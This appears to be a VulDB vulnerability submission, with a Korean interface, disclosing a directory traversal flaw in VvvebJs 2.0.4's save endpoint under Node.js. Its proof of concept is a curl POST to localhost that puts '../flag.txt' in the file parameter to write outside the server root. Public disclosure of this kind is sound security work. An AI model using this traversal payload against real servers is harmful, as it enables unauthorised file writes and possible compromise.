| 제목 | givanz Vvvebjs 2.0.4 Directory Traversal (Arbitrary File Write) |
|---|
| 설명 | VvvebJs suffers from a directory traversal vulnerability in the /save.php endpoint. The issue allows remote attackers to write arbitrary files outside the intended directory via the file POST parameter due to insufficient sanitization of user input.
This vulnerability exists only when the application is run using Node.js, following the project documentation (node save.js).
POC:
# Start the application with:
node save.js
# Send the malicious request:
curl -X POST http://localhost:8080/save.php \
-d 'file=../flag.txt&html=exploit'
This will create a file named flag.txt one level above the server root, demonstrating path traversal and arbitrary file write.
|
|---|
| 원천 | ⚠️ https://github.com/givanz/VvvebJs/issues/409 |
|---|
| 사용자 | Enigma522 (UID 88000) |
|---|
| 제출 | 2025. 07. 16. PM 01:26 (9 개월 ago) |
|---|
| 모더레이션 | 2025. 08. 04. AM 08:27 (19 days later) |
|---|
| 상태 | 수락 |
|---|
| VulDB 항목 | 318648 [givanz Vvvebjs 까지 2.0.4 node.js /save.php 파일 디렉토리 순회] |
|---|
| 포인트들 | 20 |
|---|